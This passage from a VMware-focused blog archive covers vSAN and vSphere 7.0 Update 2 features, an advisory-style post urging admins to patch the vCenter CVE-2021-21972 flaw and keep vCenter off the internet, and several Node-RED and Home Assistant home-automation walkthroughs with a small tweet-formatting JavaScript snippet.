Unplanned Outage This feature, called Durable Writes, ensures that the latest writes quickly gets committed to additional host ensuring durability of new data, combined with efficient and fast resyncs to stale components on recovered or new host. In reality, this almost makes a vSAN policy of FTT=1 act like a FTT=2 policy. In vSAN 7.0 Update 1, this was added for Maintenance Mode operations, but in Update 2 this also comes into play for unplanned outages. This enhancement also includes more frequent checks for silent disk errors. vSAN support of vSphere Proactive High Availability (HA) # Proactive response when vSAN host detects impending failure Evacuates VMs Migrates object data Uses plug-in provided by participating OEM server vendors Supports quarantine mode and maintenance mode Increased application up-time Health check history and correlation # vvSAN 7 Update 2 Health Check History View a timeline of discrete error conditions Gain insight into transient conditions that are difficult to track Provides relationship with other alerts Related symptoms or impacts Core issue File Services Improvements # vSAN File Services also gets a few improvements: Support for vSAN stretched clusters and 2-node topologies Support of Data-in-Transit Encryption and UNMAP Snapshots for file services volumes Via API Extract differences between two snapshots Improved scale, performance, and efficiency The availability of snapshots API for File Services is great, and I expect backup vendors will jump at being able to back up file shares directly. The addded support for File Services in vSAN Stretched Clusters is also a good addition, and offers affinity settings to ensure local access when available Stretched Cluster File Services Affinity The new support for 2-node topologies is also welcome, as it offers a real option for consolidating NAS filers in ROBO environments and even further reduce the footprint in those environments. Efficiency Enhancements # Any efficiency enhancements are welcome, and this releases promises a few important ones and thus improving the cost per I/O. Improved performance when using RAID-5/6 erasure codes Improved larges equential writes Reduced CPU usage Improved CPU efficiency writing data to cache/buffer tier Improved small random I/O vSAN over RDMA # vSAN over RDMA promises performance increases for vSAN. Initially there is limited hardware support for this configuration available, but expect more RoCEv2 NICs to be certified in the time to come. At the time of release, there are three Mellanox NICs on the HCL Mellanox NICs on HCL vSAN 7 Update 2 RDMA Efficient connectivity for vSAN clusters using RDMA Improved CPU utilization and app performance for certain workloads Sequential reads Random mixed reads/writes Supports RDMA over converged Ethernet v2 (RoCE v2) Automatic detection and handling of RDMA adapters vSAN 7 Update 2 Enable RDMA vSAN 7 Update 2 RDMA Adapters There are also other, minor enhancements in vSAN 7.0 Update 2, and I am sure that more details will emerge in the following hours and days after the initial announcement. I will try to maintain a list of official vSAN 7.0 Update 2 resources in the list below, as I find them. Release Notes # VMware vSAN 7.0 Update 2 Release Notes Other Resources # VMware vSAN 7.0 Update 2 Videos vSpeaking Podcast Ep 179: VMware vSAN 7 Update 2 --- # VMware vSAN 7.0 Update 2 Videos URL: https://vNinja.net/2021/03/09/vmware-vsan7u2-videos/ Date: 2021-03-09 Author: christian Tags: vSphere, vSAN, VMware, ESXi With the vSAN 7.0 Update 2 annnouncement, and availability, a series of videos has been published, and here is a list of the videos I’ve found so far. Video: What’s New in vSAN 7 Update 2 # Video: How to connect a HCI Mesh Compute Cluster to VMware vSAN 7 Update 2 # Video: Introducing VMware vSAN 7.0 U2 by Duncan Epping # Video: Configuring the vSphere Native Key Provider and vSAN Encryption with vSphere/vSAN 7.0u2 by Duncan Epping # Video: vSAN 7.0 U2 Skyline Health History by Duncan Epping # Video: Compute only HCI Mesh with vSAN 7.0 U2 by Duncan Epping # Video: vSAN 7.0 U2 Top Contributors Demo by Duncan Epping # Video: vSAN 7.0 U2 Custom Capacity Thresholds by Duncan Epping # Video: vSAN 7.0 U2 Durability Components by Duncan Epping # Video: vSAN 7.0 U2 stretched cluster integration with vSphere DRS! by Duncan Epping # Video: vSAN File Services in a Stretched vSAN 7.0 U2 cluster by Duncan Epping # Video: Configuring the vSphere Native Key Provider and vSAN Encryption with vSphere/vSAN 7.0u2 by Duncan Epping # vSAN 7.0 U1 - Shared Witness Appliance demo by Duncan Epping # Video: vSAN 7.0 U2 adds extra network metrics by Duncan Epping # Video: vSAN Enhanced Durability Components and Stretched Clusters by Duncan Epping # --- # VMware vSphere 7.0 Update 2 Announced URL: https://vNinja.net/2021/03/09/vmware-vsphere7u2-announced/ Date: 2021-03-09 Author: christian Tags: vSphere, vSAN, VMware, ESXi VMware has just announced the general availability of the new vSphere 7.0 Update 2 release, which offers a bunch of new features and improvements. This includes both new load balancer options for Tanzu, as well as greatly improved security through encryption, better lifecycle management and improvements on vMotion speeds in high bandwidth networks. Below is a quickfire list of new features and enhancements. vSphere with Tanzu # Integrated Load Balancing with NSX Advanced Load Balancer Essentials # New integrated Load Balancing option in vSphere with Tanzu. This means that there is no longer a requirement for HAProxy in that setup, which was the case in vSphere 7.0 Update 1. New in vSphere 7.0 Update 2 is the NSX Advanced Load Balancer Essentials, which is now included. This does not mean that NSX-T is required, the NSX Advanced Load Balancer Essentials is included in the vSphere for Tanzu license. vSphere with Tanzu Integrated Load Balancing Works with vSphere with Tanzu, TKG Cluster Control Plane, and Ingress for Kubernetes Load Balancer Services Orchestrated through Network Service & NSX-T Highly available & scalable Upgrades & lifecycle managed automatically Fully supported Upstream Kubernetes # vSphere with Tanzu continues matching upstream Kubernetes versions Kubernetes 1.19 support for both Supervisor cluster and Tanzu Kubernetes Grid vSphere with Tanzu makes it easy for organizations to deliver and use the latest features supported by the Kubernetes community Kubernetes 1.19 in vSphere with Tanzu Private Registry Support in vSphere with Tanzu # More flexibility and choice for container registries, through private registry support. Use registries with self-signed or internal CA certs Useful for organizational registries deployed outside vSphere with Tanzu Adds flexibility for enterprise customers in a variety of environments Artificial Intelligence & Machine Learning # Support for new NVIDIA Ampere family of GPUs Multi-Instance GPU (MIG) improves physical isolation between VMs & workloads Performance enhancements with GPU direct & Address Translation Service in the hypervisor NVIDIA Multi-Instance (MIG) GPU Supported with NVIDIA Ampere GPUs For AI/ML only (not graphics) Extension to the PCIe vGPU profiles Isolation in the internal hardware paths provides more predictable levels of performance vSphere Lifecycle Manager # vSphere Lifecycle Manager now handles vSphere with Tanzu “supervisor” cluster lifecycle operations as well as traditional virtualization. New in Lifecycle Manager is Desired Image Seeding, where an image can be extracted from an existing host. LCM Extract an image from an existing host NSX-T lifecycle support means all vSphere with Tanzu deployment models are easy to maintain Extending vLCM compatibility # New vendor plugin for select Hitachi UCP ReadyNode models Update recommendations automatically refreshed after common change events VMware image depot Change in desired image vSphere Lifecycle Manager CLI Support for vSAN Bootstrap # Configure vSAN and vSphere Lifecycle Manager in scripted deployments Drive cluster lifecycle from the moment it is created, removing the need for remediation later Enables rapid large-scale deployments and automation ESXi Suspend-to-Memory # This is an interesting one. While Quick Boot has been available since vSphere 6.7 what’s new is that it can be ised in conjunction with the new Suspend-To-Memory option in vSphere 7 Update 2. This means that ESXI hosts can be upgraded without power cycling AND without vMotioning VMs out of the host. Of course, this means that the VMs will be stunned and suspended during the upgrade process, but in some scenarios that is fine. In large scale VDI/EUC og AI/ML (GPU) clusters for instance, you could then do a rolling upgrade of the cluster without having a boot storm or moving lots of workloads around, and at the same time greatly reduce the time it takes to perform an upgrade. It will be interesting to see how quick an ESXi host can be upgraded using this feature, but rumors has it it might be seconds instead of (many) minutes compared to a non-Quick Boot upgrade. ESXi Suspend-to-Memory vMotion Auto Scale # We have been able to manually tweak vMotion for a while, to ensure maximum performance. Now that vSphere 7 Update 2 is here, it promises to take care of that tuning automatically. This will provide faster vMotions on 25, 40 and 100 GbE links without the need to manually tune it. vMoiton now automatically scales the number of streams, based on the available bandwidth. One vMotion stream is cabable or processing 15 Gbps+, so this will not have an affect on 10 GbE vMotion networks. vSphere 7 Update 2 vMotion Auto Scale Security # Quite a few new security features and enhancements are also part of the vSphere 7.0 Update 2 release: VMware vSphere Native Key Provider # A new VMware vSphere Native Key Provider makes it easier to enable vSAN Encryption, VM Encryption and vTPM. There is no longer a requirement for an external KMS, but one can still be used if there is one available, making it much easier to get started with encrypting your virtual workloads and storage. vSphere 7 Update 2 vSphere Native Key Provider Key provider integrated in vCenter Server & clustered ESXi hosts Works with ESXi Key Persistence to eliminate dependencies Adds flexible and easy-to-use options for advanced data-at-rest security ESXi Configuration Encryption # ESXi Configuration Encryption is enabled automatically, and protects boot volume secrets during service replacements. Improved by utilizing hardware TPM if there is one available. Virtual Trusted Platform Module (vTPM) support on Linux & Windows # New Virtual Trusted Platform Module (vTPM) virtual device can be added to modern versions of Microsoft Windows and select Linux distributions. This enabled in-guest security that requires TPM support, but it does not require a physical TPM in the host itself. vTPM requires that VM Encryption is enabled. VMware Tools and Guest Content Distribution # VMware Time Provider Plugin for Precision Time on Windows # VMware Tools plugin to synchronize guest clocks with Windows Time Service Added via custom install option in VMware Tools Precision Clock device available in VM Hardware 18+ Supported on Windows 10 and Windows Server 2016+ High quality alternative to traditional time sources like NTP or Active Directory VMware Tools Guest Content Distribution # “Internal CDN” for guest content, available through VMware Tools. This enables content sharing to VMs from a central repository, with granular control over participation and flexibility to choose the available content. The content can be scripts and other files administrators may want to make available inside the VM, directly through VMware Tools. There are also other enhancements, that I might have missed, in vSphere 7.0 Update 2, and I am sure that more details will emerge in the following hours and days after the initial announcement. I will try to maintain a list of official vSphere 7.0 Update 2 resources in the list below, as I find them. Release Notes # VMware vCenter Server 7.0 Update 2 Release Notes VMware ESXi 7.0 Update 2 Release Notes VMware vSphere with Tanzu Release Notes Other Resources # What’s New in SRM and vSphere Replication 8.4 vSphere 7.0 Update 2 Videos vSphere 7 Update 2 - REST API Modernization Introducing the vSphere Native Key Provider vSphere With Tanzu - NSX Advanced Load Balancer Essentials Multiple Machine Learning Workloads Using GPUs: New Features in vSphere 7 Update 2 Faster vMotion Makes Balancing Workloads Invisible Load Balancers, Private Registries, and More: What’s New in vSphere with Tanzu U2 --- # VMware vSphere 7.0 Update 2 Videos URL: https://vNinja.net/2021/03/09/vmware-vsphere7u2-videos/ Date: 2021-03-09 Author: christian Tags: vSphere, vSAN, VMware, ESXi With the vSphere 7.0 Update 2 annnouncement, and availability, a series of videos has been published, and here is a list of the videos I’ve found so far: Video: What’s New in vSphere 7 Update 2 in 10 Minutes # Video: vSphere With Tanzu - NSX Advanced Load Balancer Essentials # Video: Introduction to vSphere Native Key Provider # Video: vSphere Lifecycle Manager - Host Seeding Demo # Video: vQuicker ESXi Host Upgrades with Suspend to Memory # Video: vSphere 7.0 U2 Suspend VM to Memory by Duncan Epping # --- # Is Your VMware vCenter Publicly Available? URL: https://vNinja.net/2021/02/27/is-your-vcenter-publicly-available/ Date: 2021-02-27 Author: christian Tags: vCenter, VMware On the 23rd of February 2021 VMware issued the VMSA-2021-0002 security advisory and one of the issues it addresses is VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client (CVE-2021-21972). This is a critical issue, and if left unpatched could land your vSphere estate in big trouble as there is already Proof-of-Concepts available for this vulnerability. So get patching as soon as possible. Of course, this can only be exploited if you have access to the VMware vCenter Client, so if the management plane is isolated that helps mitigate the risk. What worries me though, is that according to zdnet.com More than 6,700 VMware servers exposed online and vulnerable to major new bug. If these number are indeed correct, a lot of VI Admins needs to have a real hard look in the mirror. That being said, all zdnet seems to have done is to is to do a scan in Shodan for vCenter instances, and not actually check if any of the results are indeed vulnerable, even if they state the following: More than 6,700 VMware vCenter servers are currently exposed online and vulnerable to a new attack that can allow hackers to take over unpatched devices and effectively take over companies’ entire networks. That number of instances are probably not vulnerable, as “only” vCenter versions prior to 6.5u3n, 6.7 U3l and 7.0 U1c are vunerable, and a bunch of these found in Shodan are most likely already patched, or running older versions. The real number of available and vulnerable instances is probably a lot less then 6,700, but that doesn’t mean that there isn’t a lot of systems out there waiting to be attacked. Apparently there is already automated scans out there, looking for installations to exploit. Also, when your vCenter is exposed, so are your ESXi hosts and that leaves you open to being attacked with CARBON SPIDER and SPRITE SPIDER, ransomware. Once that happens, you’re in for a very bad day, week or even month. Lars Trøen has posted a nice Twitter thread about the same, also linking to Shodan searches and links to a Proof-of-Concept for the exploit: There is no reason to host neither your vCenter nor ESXi host on the public internet. https://t.co/la0KzXBiMS — Lars Troen (@larstr) February 28, 2021 Summary of his links from the thread: Shodan Search for vCenters Shodan Search for ESXi hosts PoC Unauthorized RCE in VMware vCenter The ESXi ransomware post-mortem (Reddit user NetInfused) To be blunt; there is simply no valid reason why your VMware vCenter, or ESXi hosts, should be available over the internet, none what so ever. In fact, it shouldn’t even be available from non-admin clients in your local network, let alone via the internet. If that is the case in your environment, odds are that there are probably other big issues present in your infrastructure as well. I am not saying that if you expose your VMware vCenter to the internet you deserve to be exploited, but I am really, really close. Patch your stuff, and don’t expose your infrastructure to the internet. Simple. --- # Norwegian vExperts 2021 URL: https://vNinja.net/2021/02/12/norwegian-vexperts-2021/ Date: 2021-02-12 Author: christian Tags: vExpert, VMware VMware has just announced the list of vExperts for 2021 and true to tradition here is a list of the Norwegian vExperts for 2021. This year there is a total of 13 Norwegian vExperts, one more than in 2020. If you want to be included in this list when it opens up again in June 2021, it’s time to start plannning. As a vExpert Pro I’m happy to assist anyone who wants help applying! Norwegian vExperts 2021 (February) # Name Twitter Blog William Brown n/a sevenlogic.io Morten Werner Forsbring @forsbring n/a Frode Garnes @frode_garnes n/a Bengt Grønås @bgronas blog.bengt.no Rudi Martinsen @RudiMartinsen rudimartinsen.com Christian Mohn @h0bbel vNinja.net Bjørn-Tore Nikolaisen @btn003 n/a Børre Nygren @borrenygren n/a Roger Samdal @rsamdal vfokus.no Marius Sandbu @msandbu) msandbu.org Bjørn Sørensen @bjosoren tech.iot-it.no Lars Trøen @larstr core-four.info Andreas Vedå @Andyve vedaa.net That’s quite a list! Out of those 13, I’d like to especially congratulate William Brown for his inaugural inclusion! You can also check the entire official vExpert Directory for a complete list of the vExpert class of 2021. --- # Making a Node-RED Twitter Bot URL: https://vNinja.net/2021/01/20/node-red-twitter-bot/ Date: 2021-01-20 Author: christian Tags: Node-RED, Twitter, Automation I use Node-RED extensively for home automation purposes, in conjunction with Home Assistant. See the Home Automation tag for posts in that series. This post, however, is for a different use case and not home automation. For years I’ve been using Zapier to automatically tweet new posts for this site via the @vninjanet account, but that has proven rather inflexible and I wanted a better way to automate this, while adding features that Zapier currently does not support like adding specific hashtags automatically. I have been using the sites RSS feed as the trigger in Zapier, and wanted to continue doing that, even if moving it to Node-RED. Project Outline # Automatically tweet when a new post is published Ability to add hashtags to the tweet itself, from Hugo Learn something in the process Since I already have Node-RED up and running, it was a natural choice to start looking for ways to accomplish this with that tool. As it turns out, Node-RED already has nodes for RSS feed parsing and Twitter, so the grunt of it already exists. The solution I ended up with is a combination of several things in order to make everything work together. Customizing the Hugo RSS Feed # First off, I needed to customize the Hugo RSS feed to make sure the Twitter hashtags I wanted to include was also included in the RSS feed. Using Adding Author tag to RSS Feed using Hugo static site generator as a starting point, I added the following to my rss.xml file as the last line before </item> <category>{{ .Params.hashtags }}</category> This picks up whatever I have put in a posts front matter, under the hashtags variable like this: hashtags: node-red, automation After verifying that this indeed shows up in the feed, I moved on to Node-RED to create the flow. Node-RED Flow # The final flow looks like this: 1. Feedparser node (vNinja) # The feedparser node is pretty simple, all it needs is a valid Feed url, which in this case points to this sites feed. The only other configuration items are the refresh schedule, and a name. 2. rbe node # The rbe node, report-by-exception, is there to ensure that it only triggers if there is a change in the feed. When that is in place it only passes data if the input data has changed, like when a new item appears in the feed that the feedparser node monitors. While testing this flow on a test Twitter account, the account got temporarily suspended when I was testing due to posting >300 tweets in a few seconds, and the rbe node is there to ensure that doesn’t happen again… 3. Function node (Format Tweet) # The function node is where I get into deep water. I am not a developer, and have not really done anything in javascript before. But, in order to format the data received from the feedparser node into something that can be passed on to the Twitter node I had to get my hands dirty. In the feed, after the edits I did in Customizing the Hugo RSS Feed, the hashtags defined in the front matter look like this: <category>node-red, automation</category> In order to separate these out, and prepend the hash I used the following javascript code in the function node: The javascript code looks like this: var hashtags = msg.article.categories[0]; var splitHashtags = hashtags.replace(/, /g, " #"); var finalHashTags = "#"+splitHashtags; var tweet = "New post: " + msg.article.title + " " + msg.article.link + " " +finalHashTags; msg.payload = tweet; return msg; Caveat emptor: I am no developer. Never have been. There is probably way better methods to doing this in javascript, but it’s what I hacked together with zero to no experience at all. Basically this takes the input that is contained in the categories node in the feed, and removes the commas with spaces, and ads the hash before storing it in the msg.payload variable. It also adds New Post:, the title of the post and the link to the post before it appends the hashtags to the end of the string. This pretty fragile, and will certainly not work right if I don’t define my hashtags in the front matter correctly, as it expects them to be separated by commas, and not include the hashbang. There should probably be some error checking in there as well, but for now this is what I have. 4. Twitter out node (Tweet vNinja.net post) # The last node in the flow, is the Twitter out node. Before that can be used, it needs to be configured with proper Twitter credentials, like API keys and Access tokens. You can get yours at developer.twitter.com/en/apps. Once that’s configured, the Twitter out node will compose a tweet of whatever gets passed to it in the msg.payload object. Since the function node takes care of the formatting, that’s all the configuration that is needed. If everything still works as it did during testing, this post should now be autotweeted via @vninjanet with a tweet that looks something like this: New Post: Making a Node-RED Twitter Bot https://vninja.net/2021/01/20/node-red-twitter-bot/ #node-red #automation Let’s hope it still works! I’ll post the tweet below here once it is published. New post: Making a Node-RED Twitter Bot https://t.co/3NX1tWGh55 #node-red #automation — vninja.net (@vninjanet) January 20, 2021 This accomplished eveything I set out to do, and I learned something in the process. --- # How I Use Home Assistant: Part 4 — Automatically Enable and Disable Sonos Night Mode with Node-RED URL: https://vNinja.net/2021/01/03/how-i-use-home-assistant-part4/ Date: 2021-01-03 Author: christian Tags: Home Assistant, Home Automation, Node-RED, Sonos Sonos Beam is my main driver for television audio, which is great, but the sound travels between the floors in my house so I want Night Mode to be enabled late at night. I also do not want to manually have to tweak the night mode settings through the Sonos App, and figured that doing it on a schedule, from within Home Assistant was the way to go. This series of posts is not intended to be a Node-RED and Home Assistant 101 introduction. There are other resources for that readily available, that does a very good job at explaining how to get up and running: Install Home Assistant Node-RED Getting Started How to get started with Node-RED and Home Assistant Workflow description # At a given time, enable Night Mode on my Sonos At a given time, disable Night Mode on my Sonos Profit In order to get this working, the following Home Assistant integrations and Add-ons needs to be installed and configured: Node-RED Sonos Mobile App My final workflow looks like this: Node-RED Workflow Walkthrough # 1. Bigtimer Node Like in my Morning Coffee workflow, this one kicks off with a Bigtimer Node. The On Time item is set to 23:00, and the Off Time is set to 08:00. Switch Node The second part of the workflow is a simple switch node, that differentiates between an on or an off event from the Bigtimer Node. This basically just takes the output from the Bigtimer Node, which is either a value of on or off, and decides the flow from there. The topmost connector on the right hand side is the first value, which in this case is on and the second one is a value of off. Call Service Nodes Based on the value from the Switch Node is either on or off, it calls a service in Home Assistant. If the event is on, it proceeds to run Sonos: Enable Night Settings. If the event is off, then it runs the Sonos: Disable Night Settings. Sonos: Enable Night Setting # The Call Service Node: Sonos: Enable Night Setting sends a service call to the Sonos integration, with a pre-defined payload. Name is your chosen name, Server is Home Assistant, Domain is Sonos and the Service to call is set_option. In Entity Id the chosen Sonos media player is chosen. Devices can be grouped in in Home Assistant, and a service call can be sent to a a group if you want this to happen to all your Sonos devices, should you have more than one For the Data field, the following JSON needs to be put in place: Data Payload # This payload sets Sonos Night Sound to on, enables Speech Enhancement and turns off the Status Light on the device. Although I can clearly hear it when the Sonos changes to Night Mode, being able to quickly see current status by looking for the Status Light is a nice way to verify it Sonos: Disable Night Settings # The Call Service Node: Sonos: Enable Night Setting sends a service call to the Sonos integration. This is basically a copy of the Sonos: Enable Night Setting one, with a different name and a different payload in Data. Name is your chosen name, Server is Home Assistant, Domain is Sonos and the Service to call is set_option. In Entity Id the chosen Sonos media player is chosen. Data Payload # This payload sets Sonos Night Sound to off, disables Speech Enhancement and turns on the Status Light on the device. Call Service Node: Notify In this one, I have also connected another Call Service Node to send a notification to my phone when the workflow runs. Name is your chosen name, Server is yet again Home Assistant, Domain is notify and the Service to call is mobile_app_your_device. No need to put in an Entity Id for this one. Data Payload # Emojis and all! Workflow # Once all of the nodes are configured, and available in the Node-RED canvas it’s just a matter of connecting them together like this: --- # How I Use Home Assistant: Part 3 — Morning Coffee URL: https://vNinja.net/2021/01/03/how-i-use-home-assistant-part3/ Date: 2021-01-03 Author: christian Tags: Home Assistant, Home Automation, Node-RED, IKEA Trådfri I need my caffeine fix. It also needs to be very readily available when I wake up. Before home automation, I used to load my Moccamaster KBGT741 Thermal Coffee Maker with water and ground coffee before bedtime so all I had to do was to hit the power button to get caffeine flowing. But why not schedule it to before I get up so that there is always fresh coffee available the instant I get up in the morning? Add an IKEA Trådfri Smart Outlet, and I can schedule my fix! Since the coffee maker brews into a insulated carafe, it doesn’t get burned, if I sleep in, while at the same time keeping it hot. Now that is a big win! I know, this method doesn’t provide the absolute best coffee experience, but as far as I’m concerned availability beats quality in the wee hours of the morning. This series of posts is not intended to be a Node-RED and Home Assistant 101 introduction. There are other resources for that readily available, that does a very good job at explaining how to get up and running: Install Home Assistant Node-RED Getting Started How to get started with Node-RED and Home Assistant Workflow description # At a given time, power on a smart outlet. Specifically the one my coffee maker is connected to. Fresh pots Profit In order to get this working, the following Home Assistant integrations and Add-ons needs to be installed and configured: Node-RED IKEA Trådfri My final workflow looks like this: This workflow looks a bit more complex than my Light Color Changes for Calendar Based Events one, but in reality it isn’t much harder to set up. Node-RED Workflow Walkthrough # 1. Bigtimer Node The Bigtimer node is really great, and can be used for a plethora of time based events. In this workflow I’m only using it as a simple scheduler, which triggers an on event at a given time, and and off event at another time. Bigtimer Node All I do here, is set it output to on at 07:15 and off at 07:45. The ON Msg is set to on and OFF Msg is set to off, as those are the states that the IKEA Trådfri Smart Outlet expects to recieve. You can check those values in http://your-ha-instance:8123/developer-tools/state, and test setting states there. The only other setting that’s changed from default, in my setup, is that I’vee disabled the Repeat output setting at the bottom of the Bigtimer Node properties, as there is no need to repeat it once it’s fired. Bigtimer Node Repeat Output The topmost connector on the right hand side of the Bigtimer Node is the on time / off time selector, which will be connected to the next node in the workflow, the Switch Node. Switch Node The second part of the workflow is a simple switch node, that differentiates between an on or an off event from the Bigtimer Node. This basically just takes the output from the Bigtimer Node, which is either a value of on or off, and decides the flow from there. The topmost connector on the right hand side is the first value, which in this case is on and the second one is a value of off. Call Service Nodes Based on the value from the Switch Node is either on or off, it calls a service in Home Assistant. If the event is on, it proceeds to the Call Service Node: Make Coffee. If the event is off, then it runs the Call Service Node: Turn Off. Call Service Node: Make Coffee # The Call Service Node: Make Coffee simply turns the selected smart outlet on. Name is your chosen name, Server is Home Assistant, Domain is switch and the Service to call is turn_on. In Entity Id the chosen smart outlet is chosen, and that’s it. There is no need for any aditional payloads in this node. Call Service Node: Turn Off # The Call Service Node: Turn Off turns the selected smart outlet off. It is basically a copy of the Make Coffee one, with a different name and one small edit. Name is your chosen name, Server is Home Assistant, Domain is switch and the Service to call is turn_off. In Entity Id the chosen smart outlet is chosen, and that’s it. Like above, there is no need for any aditional payloads in this node. Inject Nodes The two other nodes in my workflow, are inject nodes. These are very useful, especially when working with timed events as it’s a way to force an event to happen — regardless of the timer schedule set up in the Bigtimer Node Force On # All this does, is to forcefully send a msg.payload of on to the connected Switch Node, thus making the workflow trigger the same way as a timed on message from the Bigtimer Node. The Inject Nodes are triggered manually by clicking on the square on the left hand side of the node. Force Off # Same as the Force On Inject Node, but this one sends a msg.payload of off to the Switch Node. Workflow # Once all of the nodes are configured, and available in the Node-RED canvas it’s just a matter of connecting them together like this: Once the workflow works as intended, the Inject Nodes can be removed, but I like keeping them around as easy debug tools while developing time based workflows. Nothing is more annoying than having to wait to a given time for something to happen, only to find that it doesn’t work. That’s how I ensure my caffeine fix is ready when I wake up, courtesy of Home Assistant, Node-RED and IKEA Trådfri. --- # How I Use Home Assistant: Part 2 — Light Color Changes for Calendar Based Events with Node-RED URL: https://vNinja.net/2021/01/02/how-i-use-home-assistant-part2/ Date: 2021-01-02 Author: christian Tags: Home Assistant, Home Automation, Node-RED In my hallway there are a few Phillips Hue White and Color Ambiance Bulbs that I’ve had some fun with the last couple of years. Originally automated through IFTTT, they change color if one of my favorite football teams play a match. This has been working well for quite some time, but with IFTTT recently starting to limit the amount of Applets you can create, and the fact that they only run every 15 minutes, I decided to try and emulate the functionality I used with Home Assistant and Node-RED instead. This series of posts is not intended to be a Node-RED and Home Assistant 101 introduction. There are other resources for that readily available, that does a very good job at explaining how to get up and running: Install Home Assistant Node-RED Getting Started How to get started with Node-RED and Home Assistant My Workflow description # Check a calendar for match events When a match starts, change the light color to the correct RGB value Profit In order to get this working, there are a couple of Home Assistant Integrations and Add-ons that needs to be installed and configured: Node-RED Phillips Hue Google Calendar Event Of course, I also need the fixture lists available in Google Calendar, which is easily done by subscribing to publicly available calendars. fixtur.es takes care of that part, and seems to be doing a very good job at updating the calendars if there are changes. I based my previous IFTTT workflows on the same calendar, and it has worked well for years. Once the calendars are available in Home Assistant, you can start automating based on the events in them. My final workflow looks like this: Node-RED and Home Assistant Workflow Walkthrough # 1. Trigger: State Node First there is a Trigger: State Node that checks the corresponding calendar for events Name is my given name for the trigger. Server is Home Assistant, and the Entity ID is the device_id name given for the calendar in it’s configuration in google_calendars.yaml, prefixed by calendar. In this setup, the entity id is calendar.liverpool. - cal_id: xyz@import.calendar.google.com entities: - device_id: liverpool ignore_availability: true name: Fixtures Liverpool track: true The way the calendar integration works, is that if there is an event in calendar.yourname, its state is on. If it’s on, there is a match, so we can work from that. 2. Call Service Node The next is a Call Service Node, that calls a service within Home Assistant, to make something happen. Name is once again the name I gave the it, Server is Home Assistant. Since we’re changing a light, the Domain is light, the entity id is the light or group of lights in this case (these bulbs are grouped in Home Assistant to one group light.hallway) and the Service we want to call is turn_on. The turn_on service works even if the light is already on, so there is no need to create any logic around checking if the light(s) are on or off before sending data to them. The “magic” here is within the Data field, which is where the payload we send to the Hue integration is stored. 3. Payloads In this case, I want to change the light color, and brightness, so the JSON contained in the data field looks like this: Liverpool FC # This sets the color to the RGB value of 208,0,39, and maximum brightness of 255. Since this example uses the Liverpool FC calendar, I picked the RGB value for the light from their official logo. I did the same and use a different color value for for the SK Brann trigger: SK Brann # Workflow # Once all the different nodes are configured, it’s just a matter of connecting them together to create a full workflow. The top most connector on the node, is the one that gets triggered when a calendar event is “on”, so in this automation I have only connected an action there. If there is nothing in the calendar, I don’t want to do anything so I leave that as is. Duplicate this for any other calendar events, and / or colors you want, and that’s it. In the screenshot above, there is also a Debug Node connected, just to make sure I catch debug data when the events trigger. I am sure there are loads of other use cases for calendar based automation in Home Assistant and this might perhaps not the most useful automation ever, but it is a fun one! There are probably many other use cases for this as well, like doing special lighting for your spouse or kids birthdays. --- # How I Use Home Assistant: Part 1 — My Setup URL: https://vNinja.net/2021/01/01/how-i-use-home-assistant/ Date: 2021-01-01 Author: christian Tags: Home Assistant, Home Automation, Node-RED I’ve been running Home Asssistant (HA) in my network for well over a year now, and it’s primary use case has been connecting devices from different ecosystems into one management interface. Lately I have been migrating a few automations from native HA to Node-RED, which has been a fun exercise, and I’m looking to expand the usage of automations in the time to come. My mantra for this setup is that everything that can be automated, should be automated, while at the same time keeping it as simple and unobtrusive as possible for everyone in the household. As I’ve written about earlier, my IoT devices are split into a separate network, but that has not been a problem when integrating the various services into HA. Below is a list of integrations, add-ons and automations I have running in my current configuration: Home Assistant Integrations # IKEA TRÅDFRI — Most of my bulbs and sockets switches are IKEA Trådfri based. Currently there are 31 devices connected to it. Philips Hue — Bulbs and Lights. 22 in total Verisure — Home Alarm System, with motion sensors and socket switches Netatmo — Used for outside and indoor climate readings Pi-hole — Blocks trackers and ads in my network (setup), and this integration provides nice statistics for my HA Dashboards Plex Media Server — Enables event triggers when something is playing on Plex Sonos — Sonos Beam connected to my Samsung TV Synology DSM — Provides sensors for my Synology NAS Volumio — Volumio on an rPI provides me with streaming features for my old stereo amplifier (setup) Elgato Key Light — Home Office Video lighting Easee EV Charger — Monitoring and managing my EV Charger. Tibber — Provides real time power consumption, and price information from my power provider Google Cast — I have a Chromecast connected to an older TV in the basement. Google Calendar Event — Use Google Calendar events as binary triggers HACS — Home Assistant Community Store There are a few others installed as well, but these are the main ones I actively use. Home Assistant Add-ons # Node-RED — Automation workflow tool, preconfigured with HA integration Terminal & SSH — Enables Terminal and SSH access to the HA instance directly from HA itself Visual Studio Code — Visual Studio Code, directly in your browser while accessing HA. Preconfigured with HA integration, including autocompletion Examples of automations I have running # Light color changes for calendar based events Automatically turn on or off Sonos Night Mode Automatically brew a pot of fresh coffee every morning Automatically turn of the coffee machine after 30 minutes (regardless if it’s powered on manually or via an automation) Sunrise / Sunset Lighting on / off Motion sensor triggered lights in the basement/bar area (triggers and lights from different ecosystems) These automations are all pretty simple, as I’m really a novice when it comes to building automations in Node-RED, but they should be good examples for starter automations. I am sure this will be expanded throughout 2021, as I am really just starting dipping my toes into the possibilities of this setup. At the moment, my Home Assistant Lovelace dashboards are a mess, and not very useful. I need to spend some time on reorganizing and decluttering them as well, but for now the main focus has been on automation. Perhaps I’ll do a series on Lovelace dashboards later on, once I get my Home Assistant house in order. --- # Forward Looking Statements: 2021 Edition URL: https://vNinja.net/2020/12/07/forward-looking-statements-2021/ Date: 2020-12-07 Author: christian Tags: 2021, Plans, Review, Personal Misleading title, I know, especially considering most of this post is actually looking back at 2020. It has been a few years since I did one of these posts, and with the havoc of 2020 close to be firmly in the rearview mirror. The year that is, I am under no illusion that 2020 is indeed just hindsight, but why not try to pick it up again? Since I didn’t post a list of goals for 2020, it’s hard to review it item by item, but it’s safe to say that 2020 has been one hell of a year. A lot of people have been much more adversely affected by the whole COVID-19 pandemic than I have, but being confined to the Home Office of Isolation™ since March has taken it’s toll, at least mentally. I’m lucky enough to have my own dedicated office, grown kids that doesn’t need home schooling and an employer who facilitates, and embraces, remote work. I know everyone else doesn’t have that luxury, given their role, but for those of us who has, it is a blessing. 2020 has also shown us who the real heroes are, the front line workers who can’t do their job from a comfortable and safe home office. Health care workers, teachers, public transport, shop workers and others who provide crucial services. On behalf of us lucky ones, thank you for being there. Thank you for caring, and thank you for making it possible for the rest of us to continue working. Hopefully 2021 will be better, at least eventually, as the vaccines become available, and we can start to slowly return to a new kind of normal. 2020 has proven one thing though, and that is that working from home works, for those who have jobs that allow it. The last year has also opened a few customers eyes 